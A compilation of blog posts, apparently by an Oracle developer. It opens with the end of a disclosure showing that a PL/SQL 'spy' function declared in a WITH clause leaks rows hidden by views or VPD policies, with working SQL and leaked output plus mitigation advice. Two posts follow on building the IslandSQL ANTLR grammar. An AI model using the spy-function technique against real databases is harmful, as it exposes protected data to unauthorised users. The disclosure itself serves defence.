  • the database parameter optimizer_secure_view_merging is set to false,
  • the optimizer applies the spy function to an intermediate result and
  • the user u2 has the create procedure privilege.

When you call alter system set optimizer_secure_view_merging=true scope=memory; then the result of the previous query looks like this:

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=4 pad=AszBGEUGEL

The spy function does not reveal protected data anymore. Thanks to optimizer_secure_view_merging=true.

The Next Problem

The customer’s connect users do not have create procedure privileges. After all, it’s a PinkDB application. Hence I could recommend setting optimizer_secure_view_merging=false, because the connect users would not be able to write their own spy functions, right?

Wrong. For two reasons.

Firstly, the user could have access to an existing function that might be misused, e.g. a logger function.
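
For example, any existing function that records its arguments and can be called in a where clause would do. A sketch with a made-up logging function:

-- hypothetical: log_pkg.log persists its argument and returns 1
select id, pad
  from v
 where id between 1 and 5
   and log_pkg.log('id=' || id || ' pad=' || pad) = 1;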

Secondly, we are on 19c. And since 12.1 we have plsql_declarations to write PL/SQL functions and procedures in the with_clause of a select statement. As a result, I can write a spy function without the create procedure privilege. For example like this:

set serveroutput on size unlimited
with
   function spy(
      in_id  in number,
      in_pad in varchar2
   ) return number as
   begin
      dbms_output.put_line('id='
         || in_id
         || ' pad='
         || in_pad);
      return 1;
   end;
select id, pad
  from v
 where id between 1 and 5
   and spy(id, pad) = 1
/

        ID PAD       
---------- ----------
         1 DrMLTDXxxq
         4 AszBGEUGEL

id=1 pad=DrMLTDXxxq
id=2 pad=XOZnqYRJwI
id=3 pad=nlGfGBTxNk
id=4 pad=AszBGEUGEL
id=5 pad=qTSRnFjRGb

Again, look at the server output for id 2, 3 and 5. Protected data is revealed, even if the user has only the create session privilege and optimizer_secure_view_merging is set to true. IMO this is clearly a security bug.

What Database Versions Are Affected?

I assume that all Oracle Database versions from 12.1 onwards are affected. Including Autonomous Databases. I have explicitly tested the following versions:

  • OCI as of 2022-10-30:
    • Autonomous Database 21c (ATP)
    • Autonomous Database 19c (ADW, AJD)
  • On-Premises
    • Oracle Database XE 21c
    • Oracle Database Enterprise Edition 19c (19.16)

What Can We Do?

I created SR 3-31087264311 for this issue. I expect that either a workaround is provided or a bug is opened and a fix will be available soon. I’ll update this blog post accordingly.

In any case, if you have views or VPD policies for security purposes, set optimizer_secure_view_merging=true and ensure that the connect users do not have the create procedure privilege. Follow the principle of least privilege.
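
The following query can help to verify the latter; it requires access to dba_sys_privs:

select grantee
  from dba_sys_privs
 where privilege = 'CREATE PROCEDURE'
 order by grantee;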

The post optimizer_secure_view_merging and plsql_declarations appeared first on Philipp Salvisberg's Blog.

IslandSQL Episode 1: Select Statement


Introduction

An island grammar focuses only on a small part of a grammar. The island represents the small, interesting part and the sea the rest. In this blog post, I explain the components of an island grammar for SQL scripts named IslandSQL. In the first iteration, we focus on the select statement. Everything else is not of interest for the time being.

Use Case

Let’s assume we want to write an extension for Visual Studio Code that can find text in select statements within SQL files of a workspace. So what is the difference compared to VSCode’s integrated text search? Well, the text search does not know what a select statement is. It finds occurrences of the search text in all kinds of places. In fact, identifying a select statement is not as easy as one might think.

Let’s look at an example.

/* select * from t1; */
-- select * from t2;
remark select * from t3;
prompt select * from t4;
begin
    sys.dbms_output.put_line('irrelevant: select * from t5;');
end;
/
create or replace procedure p is
begin
   $if false $then irrelevant: select * from t6; $end
   null;
end;
/

This SQL script does not contain relevant select statements. A select statement within a comment is hardly relevant. The same is true for select statements in remark and prompt commands. I also consider select statements within string literals and conditional compilation text irrelevant, at least in this example.

So let’s look at another example:

-- simple
select * from dept;
-- subquery_factoring_clause
with
   d as (
      select * from dept
   )
select * from d;
-- plsql_declarations
with
   function e_count (in_deptno in dept.deptno%type) return integer is
      l_count integer;
   begin
      select count(*)
        into l_count
        from emp;
      return l_count;
   end e_count;
select deptno, e_count(deptno)
  from dept
/
-- unterminated
select * from dept

This example script contains four select statements. As you can see, a select statement does not necessarily need to start with the select keyword. Furthermore, a select statement can end on a semicolon, a slash or EOF (end-of-file). In fact, when using plsql_declarations the statement must end on a slash (or EOF).

Here’s a screenshot of the VSCode extension after searching for the regular expression .+ in the demo workspace, highlighting the third search result.

IslandSQL VSCode extension: search result

Lexer Grammar

The responsibility of the lexer is to convert a stream of characters to a stream of tokens. We use ANTLR 4 to generate our lexer with Java as the target language.

Here’s the grammar definition for our lexer.

lexer grammar IslandSqlLexer;

options {
    superClass=IslandSqlLexerBase;
    caseInsensitive = true;
}

/*----------------------------------------------------------------------------*/
// Comments and alike to be ignored
/*----------------------------------------------------------------------------*/

ML_COMMENT: '/*' .*? '*/' -> channel(HIDDEN);
SL_COMMENT: '--' .*? (EOF|SINGLE_NL) -> channel(HIDDEN);
REMARK_COMMAND:
    {isBeginOfCommand()}? 'rem' ('a' ('r' 'k'?)?)?
        (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;
PROMPT_COMMAND:
    {isBeginOfCommand()}? 'pro' ('m' ('p' 't'?)?)?
       (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;
STRING:
    'n'?
    (
          (['] .*? ['])+
        | ('q' ['] '[' .*? ']' ['])
        | ('q' ['] '(' .*? ')' ['])
        | ('q' ['] '{' .*? '}' ['])
        | ('q' ['] '<' .*? '>' ['])
        | ('q' ['] . {saveQuoteDelimiter1()}? .+? . ['] {checkQuoteDelimiter2()}?)
    ) -> channel(HIDDEN)
;
CONDITIONAL_COMPILATION_DIRECTIVE: '$if' .*? '$end' -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Islands of interest on DEFAULT_CHANNEL
/*----------------------------------------------------------------------------*/

PLSQL_DECLARATION:
    {isBeginOfStatement()}? 'with' WS
        ('function'|'procedure') SQL_TEXT*?  PLSQL_DECLARATION_END
;
SELECT:
    {isBeginOfStatement()}? ('with'|('(' WS?)* 'select') SQL_TEXT*? SQL_END
;

/*----------------------------------------------------------------------------*/
// Whitespace
/*----------------------------------------------------------------------------*/

WS: [ \t\r\n]+ -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Any other token
/*----------------------------------------------------------------------------*/

ANY_OTHER: . -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Fragments to name expressions and reduce code duplication
/*----------------------------------------------------------------------------*/

fragment SINGLE_NL: '\r'? '\n';
fragment CONTINUE_LINE: '-' [ \t]* SINGLE_NL;
fragment SQLPLUS_TEXT: (~[\r\n]|CONTINUE_LINE);
fragment SQL_TEXT: (ML_COMMENT|SL_COMMENT|STRING|.);
fragment SLASH_END: SINGLE_NL WS* '/' [ \t]* (EOF|SINGLE_NL);
fragment PLSQL_DECLARATION_END: ';'? [ \t]* (EOF|SLASH_END);
fragment SQL_END:
      EOF
    | (';' [ \t]* SINGLE_NL?)
    | SLASH_END
;
fragment SQLPLUS_END: EOF|SINGLE_NL;

Lexer Options

On line 3-6 we define the grammar options.

The first option defines the super class that the generated lexer class should extend from. We use this class to define semantic predicates that can be used in the lexer grammar. Semantic predicates are very powerful. However, they bind a grammar to a target language. Of course, you can implement a super class in different target languages. But would you want to do that for every supported target language?

The second option defines the grammar as case-insensitive. This simplifies the grammar. We can simply write select instead of S E L E C T where every letter is a fragment (e.g. fragment S: [sS];).

Channels

A token can be either ignored (skipped) or placed on a channel. ANTLR provides by default the following two channels:

  • DEFAULT_CHANNEL: for visible tokens that are relevant for the parser grammar
  • HIDDEN: for tokens that are not relevant for the parser grammar

We do not skip tokens in this grammar. This has the advantage that we can access hidden tokens when we need to. For example, for accessing hints or for lossless serialisation of chosen parts.

Comments and Alike

On line 8-33 we define hidden tokens using lexer rules.

The notation for the token definitions should be familiar to those with regular expression experience.
— Terence Parr, The Definitive ANTLR 4 Reference, 2nd edition, page 36

The tokens defined in this section are similar to comments and therefore should be ignored and placed on the hidden channel.

The order of the rules is important in case of conflicting definitions. The first rule wins. ML_COMMENT defines a multiline comment starting with /*  and ending with */. The rules defined afterwards cannot define tokens that are a subset of ML_COMMENT. For example,  a select statement within a ML_COMMENT is not visible for subsequent rules. This is the reason for the rules in this section. We want to hide select statements within comments and alike.

However, it is possible to define a token that contains a ML_COMMENT, e.g. in a select statement.

Islands of Interest

You find the islands of interest on line 35-45. The rule PLSQL_DECLARATION covers the select statement with a plsql_declarations clause. And the rule SELECT covers the select statement without a plsql_declarations clause. Identifying the end of the select statement is a bit tricky.

This definition works in many cases, but it will falsely match subqueries in other statements such as insert, update, delete, merge, etc. In such cases everything up to the next semicolon is considered part of the select statement. We will address this flaw in a future version of the grammar.

How do we ignore semicolons in comments and strings? By using the fragment SQL_TEXT. A SQL_TEXT is either a ML_COMMENT, a SL_COMMENT, a STRING or any other character (.). Again, the order is important. The lexer considers comments and strings as single tokens. A semicolon in comments or strings is not visible. As a result a semicolon in comments or strings will not be interpreted as the end of a select statement.

Did you wonder why I use ANTLR instead of regular expressions? Well, it’s simply not possible to write a regular expression that can match a complete select statement ending on semicolon while ignoring the semicolons in comments and strings. Simply put, ANTLR is more powerful.

These two rules produce a single token for the whole select statement. This is simple and enough for our current use case. However, in coming versions of the grammar we will rewrite this section to parse a select statement completely and address the issues with subqueries in other statements.

Whitespace

The WS rule on line 51 defines whitespace characters. They are not relevant for the parser, hence we put them on the HIDDEN channel.

Other Tokens

The ANY_OTHER rule on line 57 covers any other character. They are not relevant for the parser and we put them also on the HIDDEN channel.

Fragments

And finally, on lines 59-74 we have fragments. A fragment allows naming an expression and using the fragment name instead of the expression in other fragments or rules. This makes the grammar more readable without introducing additional token types.

Parser Grammar

We use the output of the lexer – the token stream – in the parser. By default only the tokens on the DEFAULT_CHANNEL are visible in the parser grammar. This makes the grammar quite simple.

parser grammar IslandSqlParser;

options {
    tokenVocab=IslandSqlLexer;
}

/*----------------------------------------------------------------------------*/
// Start rule
/*----------------------------------------------------------------------------*/

file: selectStatement* EOF;

/*----------------------------------------------------------------------------*/
// Rules for reduced SQL grammar (islands of interest)
/*----------------------------------------------------------------------------*/

selectStatement: PLSQL_DECLARATION | SELECT;

Parser Options

On line 4 we include the token vocabulary based on the lexer grammar. The vocabulary defines integer values for each token type, e.g. PLSQL_DECLARATION=7 or SELECT=8. The token stream uses these integer values to identify token types. Integers are shorter than their string counterparts and therefore use less resources.

Start Rule

You find the start rule file on line 11. It is the entry point for the parser and produces the root node of the parse tree.

A file may contain an unbounded number of selectStatement rules, and it ends on the pseudo token EOF (end-of-file). This way we ensure that the parser reads the complete file.

Select Statement

On line 17 the selectStatement is defined as either a PLSQL_DECLARATION or a SELECT token.

That’s it. All other tokens are hidden and invisible to the parser.

Furthermore, it’s not possible to produce a parse error with this grammar. Everything that is not a selectStatement is on the hidden channel and irrelevant.
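
A quick, hedged sketch to verify this claim by feeding non-SQL text to the parser (class and package names are assumptions based on the Maven Central example below):

import org.antlr.v4.runtime.CharStreams;
import org.antlr.v4.runtime.CommonTokenStream;

import ch.islandsql.grammar.IslandSqlLexer;  // assumed locations of the
import ch.islandsql.grammar.IslandSqlParser; // generated lexer and parser

class NoErrorDemo {
    public static void main(String[] args) {
        var lexer = new IslandSqlLexer(CharStreams.fromString("this is not sql at all"));
        var parser = new IslandSqlParser(new CommonTokenStream(lexer));
        parser.file(); // every character lands on the HIDDEN channel, the file rule sees only EOF
        System.out.println(parser.getNumberOfSyntaxErrors()); // expected: 0
    }
}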

Interpreter

ANTLR is a parser generator. It takes the lexer and parser grammar as input and produces a lexer and parser in a chosen target language as output.

However, there are also ANTLR interpreters: as a plugin in IDEs such as IntelliJ, as a standalone application or as a web application. After pasting the grammars into the UI you can play with them. Here's a screenshot of the web variant, ANTLR lab.

What about semantic predicates? The interpreter acts as if the call returned true. As a result, for example, xselect * from dual; is falsely recognized as a select statement. Nevertheless, this is usually good enough to explore most parts of an ANTLR grammar.

IslandSQL on GitHub

The source code of the IslandSQL parser is available on GitHub, licensed under the Apache License, Version 2.0.

However, you will not find any test cases in this repo. I have written 92 test cases for the initial version 0.1.0. They are stored in a private repository and I do not plan to release them, at least not right now; it's a way to make an unfriendly fork harder. But once the grammar has evolved to cover a significant subset of SQL of the relevant database management systems, the situation might be different.

IslandSQL on Maven Central

The IslandSQL parser is available on Maven Central. This makes integration into your preferred build system easy.

And using the parser is also easy. Here is an example:

import ch.islandsql.grammar.IslandSqlDocument;
import ch.islandsql.grammar.IslandSqlParser;

class Demo {
    public static void main(String[] args) {
        // the select statements in the first four lines are hidden in
        // comments and SQL*Plus commands and therefore invisible to the parser
        var doc = IslandSqlDocument.parse("""
                /* select * from t1; */
                -- select * from t2;
                rem select * from t3;
                prompt select * from t4;
                -- simple
                select * from dept;
                -- subquery_factoring_clause
                with d as (select * from dept) select * from d;
                -- other statements
                delete from t5;
                update t6 set c1 = null;
                commit;
                """);
        // text of the start rule, i.e. all visible tokens
        System.out.println(doc.getFile().getText());
        System.out.println("----------");
        // direct children of the start rule
        doc.getFile().children.forEach(child -> System.out.print(child.getText()));
        System.out.println("\n----------");
        // all select statements in the parse tree
        doc.getAllContentsOfType(IslandSqlParser.SelectStatementContext.class)
                .forEach(stmt -> System.out.print(stmt.getText()));
    }
}

The output of the main method is:

select * from dept;
with d as (select * from dept) select * from d;
<EOF>
----------
select * from dept;
with d as (select * from dept) select * from d;
<EOF>
----------
select * from dept;
with d as (select * from dept) select * from d;

IslandSQL on Visual Studio Code Marketplace

The extension for IslandSQL is available in the Visual Studio Code Marketplace. You can install it directly from any VS Code installation.

Agreed, this extension is currently of limited value. However, it was a good opportunity to learn about VS Code extension development and how to use the tooling around Microsoft's Language Server Protocol (LSP) to integrate a grammar that is written in Java.

I am sure I can use this knowledge for other projects like utPLSQL once SQL Developer for VS Code is available.

Outlook

I plan to extend the IslandSQL grammar step by step and blog about the progress. At some point it will be necessary to move the logic from the lexer to the parser. Before that, I’ll be working on the lexer side a bit longer.

Adding the missing DML statements to the grammar will be the next item on my to-do list.

Another topic is utPLSQL. The utPLSQL annotations in package specifications could easily be parsed with a dedicated island grammar. We could visualise test suite hierarchies in the IDE and also consider tags. Of course, we would duplicate some of utPLSQL's code in the database. The advantage of such an approach is that we know where a test package is located in the file system. This helps in navigating to the right place, e.g. after test execution failures, and could greatly improve the experience of file-based development (compared to SQL Developer). I am looking forward to the next generation of SQL Developer based on VS Codium, where such an extension would bring the most value.


IslandSQL Episode 2: All DML Statements

Introduction

In the last episode we built the initial version of IslandSQL, an island grammar for SQL scripts covering select statements. In this blog post we extend the grammar to handle the remaining DML statements.

The full source code is available on GitHub and the binaries on Maven Central.

Lexer Changes

The lexer grammar contains a new fragment COMMENT_OR_WS on line 98. We use this fragment in all DML lexer rules after the starting keywords. Why? Because comments can be used besides whitespace after a keyword, as in with/*comment*/function e_count.... The previous lexer version required whitespace after the with keyword for select statements with a plsql_declarations clause.

I also merged the former PLSQL_DECLARATION rule into the SELECT rule, mainly to have a single lexer rule for all DML statements. It's more consistent and easier to understand IMO.
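
Here is a hedged sketch using the IslandSqlDocument API introduced in the last episode to verify the new behaviour; the statement with the plsql_declarations clause is made up for this example:

import ch.islandsql.grammar.IslandSqlDocument;
import ch.islandsql.grammar.IslandSqlParser;

class CommentAfterWithDemo {
    public static void main(String[] args) {
        // a comment instead of whitespace after the with keyword
        var doc = IslandSqlDocument.parse("""
                with/*comment*/function f return number is
                begin return 1; end;
                select f from dual;
                /
                """);
        // expected: the complete statement is recognized as one selectStatement
        doc.getAllContentsOfType(IslandSqlParser.SelectStatementContext.class)
                .forEach(stmt -> System.out.print(stmt.getText()));
    }
}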

lexer grammar IslandSqlLexer;

options {
    superClass=IslandSqlLexerBase;
    caseInsensitive = true;
}

/*----------------------------------------------------------------------------*/
// Comments and alike to be ignored
/*----------------------------------------------------------------------------*/

ML_COMMENT: '/*' .*? '*/' -> channel(HIDDEN);
SL_COMMENT: '--' .*? (EOF|SINGLE_NL) -> channel(HIDDEN);

REMARK_COMMAND:
    {isBeginOfCommand()}? 'rem' ('a' ('r' 'k'?)?)?
        (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;

PROMPT_COMMAND:
    {isBeginOfCommand()}? 'pro' ('m' ('p' 't'?)?)?
       (WS SQLPLUS_TEXT*)? SQLPLUS_END -> channel(HIDDEN)
;

STRING:
    'n'?
    (
          (['] .*? ['])+
        | ('q' ['] '[' .*? ']' ['])
        | ('q' ['] '(' .*? ')' ['])
        | ('q' ['] '{' .*? '}' ['])
        | ('q' ['] '<' .*? '>' ['])
        | ('q' ['] . {saveQuoteDelimiter1()}? .+? . ['] {checkQuoteDelimiter2()}?)
    ) -> channel(HIDDEN)
;

CONDITIONAL_COMPILATION_DIRECTIVE: '$if' .*? '$end' -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Islands of interest on DEFAULT_CHANNEL
/*----------------------------------------------------------------------------*/

CALL:
    {isBeginOfStatement()}? 'call' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

DELETE:
    {isBeginOfStatement()}? 'delete' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

EXPLAIN_PLAN:
    {isBeginOfStatement()}? 'explain' COMMENT_OR_WS+ 'plan' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

INSERT:
    {isBeginOfStatement()}? 'insert' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

LOCK_TABLE:
    {isBeginOfStatement()}? 'lock' COMMENT_OR_WS+ 'table' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

MERGE:
    {isBeginOfStatement()}? 'merge' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

UPDATE:
    {isBeginOfStatement()}? 'update' COMMENT_OR_WS+ SQL_TEXT+? SQL_END
;

SELECT:
    {isBeginOfStatement()}?
    (
          ('with' COMMENT_OR_WS+ ('function'|'procedure') SQL_TEXT+? PLSQL_DECLARATION_END)
        | ('with' COMMENT_OR_WS+ SQL_TEXT+? SQL_END)
        | (('(' COMMENT_OR_WS*)* 'select' COMMENT_OR_WS SQL_TEXT+? SQL_END)
    )
;

/*----------------------------------------------------------------------------*/
// Whitespace
/*----------------------------------------------------------------------------*/

WS: [ \t\r\n]+ -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Any other token
/*----------------------------------------------------------------------------*/

ANY_OTHER: . -> channel(HIDDEN);

/*----------------------------------------------------------------------------*/
// Fragments to name expressions and reduce code duplication
/*----------------------------------------------------------------------------*/

fragment SINGLE_NL: '\r'? '\n';
fragment CONTINUE_LINE: '-' [ \t]* SINGLE_NL;
fragment COMMENT_OR_WS: ML_COMMENT|SL_COMMENT|WS;
fragment SQLPLUS_TEXT: (~[\r\n]|CONTINUE_LINE);
fragment SQL_TEXT: (ML_COMMENT|SL_COMMENT|STRING|.);
fragment SLASH_END: SINGLE_NL WS* '/' [ \t]* (EOF|SINGLE_NL);
fragment PLSQL_DECLARATION_END: ';'? [ \t]* (EOF|SLASH_END);
fragment SQL_END:
      EOF
    | (';' [ \t]* SINGLE_NL?)
    | SLASH_END
;
fragment SQLPLUS_END: EOF|SINGLE_NL;

Parser Changes

The start rule file on line 11 in the parser grammar is now defined as an unbounded number of dmlStatement rules. Each DML statement is a single lexer token. It's still not possible to produce a parse error with this grammar. We only process DML statements; everything else is hidden and therefore ignored.

parser grammar IslandSqlParser;

options {
    tokenVocab=IslandSqlLexer;
}

/*----------------------------------------------------------------------------*/
// Start rule
/*----------------------------------------------------------------------------*/

file: dmlStatement* EOF;

/*----------------------------------------------------------------------------*/
// Rules for reduced SQL grammar (islands of interest)
/*----------------------------------------------------------------------------*/

dmlStatement:
      callStatement
    | deleteStatement
    | explainPlanStatement
    | insertStatement
    | lockTableStatement
    | mergeStatement
    | selectStatement
    | updateStatement
;

callStatement: CALL;
deleteStatement: DELETE;
explainPlanStatement: EXPLAIN_PLAN;
insertStatement: INSERT;
lockTableStatement: LOCK_TABLE;
mergeStatement: MERGE;
updateStatement: UPDATE;
selectStatement: SELECT;
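
To see the new rules in action, here is a sketch that assumes the rule contexts follow ANTLR's naming convention (dmlStatement becomes DmlStatementContext), analogous to SelectStatementContext in the last episode:

import ch.islandsql.grammar.IslandSqlDocument;
import ch.islandsql.grammar.IslandSqlParser;

class DmlDemo {
    public static void main(String[] args) {
        var doc = IslandSqlDocument.parse("""
                lock table emp in exclusive mode;
                update emp set sal = sal * 1.1;
                commit;
                select count(*) from emp;
                """);
        // expected: three DML statements; the commit stays on the hidden channel
        doc.getAllContentsOfType(IslandSqlParser.DmlStatementContext.class)
                .forEach(stmt -> System.out.print(
                        stmt.getChild(0).getClass().getSimpleName() + ": " + stmt.getText()));
    }
}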

IslandSQL for VS Code

The extension for Visual Studio Code version 0.2.0 finds text in all DML statements and is no longer limited to select statements. And a symbol for each DML statement is now shown in the outline view.

Outlook

A grammar that can parse all DML statements sounds complete. However, this grammar is far from it. For code analysis, getting a single token per DML statement is at best a good starting point.

What we need is a more detailed result. For this, we need to move the logic from the lexer to the parser. In the next episode we will do this with one of the DML statements.

